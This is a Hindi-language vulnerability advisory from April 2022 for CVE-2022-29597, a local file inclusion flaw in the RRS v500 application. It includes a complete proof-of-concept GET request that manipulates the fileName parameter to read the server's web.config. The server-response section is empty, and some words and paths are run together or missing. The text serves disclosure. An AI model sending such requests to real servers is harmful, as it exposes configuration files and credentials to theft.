
RRS v500 एप्लिकेशन एक Local File Inclusion (LFI) भेद्यता के प्रति संवेदनशील है।
सॉल्यूशंस अटलांटिक द्वारा RRS v500 एप्लिकेशन में स्थानीय फ़ाइल समावेशन (LFI) कमजोरी मौजूद है। कोई भी प्रमाणित उपयोगकर्ता /RRSWeb/maint/ShowDocument/ShowDocument.aspx पृष्ठ पर किए गए अनुरोधों में आंतरिक सिस्टम फ़ाइलों को संदर्भित कर सकता है। सर्वर अनुरोधित आंतरिक सिस्टम फ़ाइल की सामग्री के साथ सफलतापूर्वक प्रतिक्रिया देगा। यह क्षमता विरोधियों को अंतर्निहित फ़ाइल सिस्टम से संवेदनशील डेटा और/या फ़ाइलें निकालने, सिस्टम के आंतरिक कार्यों के बारे में जानकारी प्राप्त करने या एप्लिकेशन के स्रोत कोड तक पहुंचने की अनुमति दे सकती है।
Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597
NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29597
प्रभावित URL:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxRRS साइट से PDF खोलते या डाउनलोड करते समय, प्रभावित URL पर एक अनुरोध किया जाता है जिसमें fileName पैरामीटर शामिल होता है। इस पैरामीटर को संशोधित करके एक आंतरिक सिस्टम पथ, जैसे , शामिल किया जा सकता है। सर्वर तब अनुरोधित फ़ाइल प्रस्तुत करेगा।
web.configweb.config के आंतरिक पथ के साथ GET अनुरोध:
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive
सर्वर प्रतिक्रिया:

अप्रैल 2022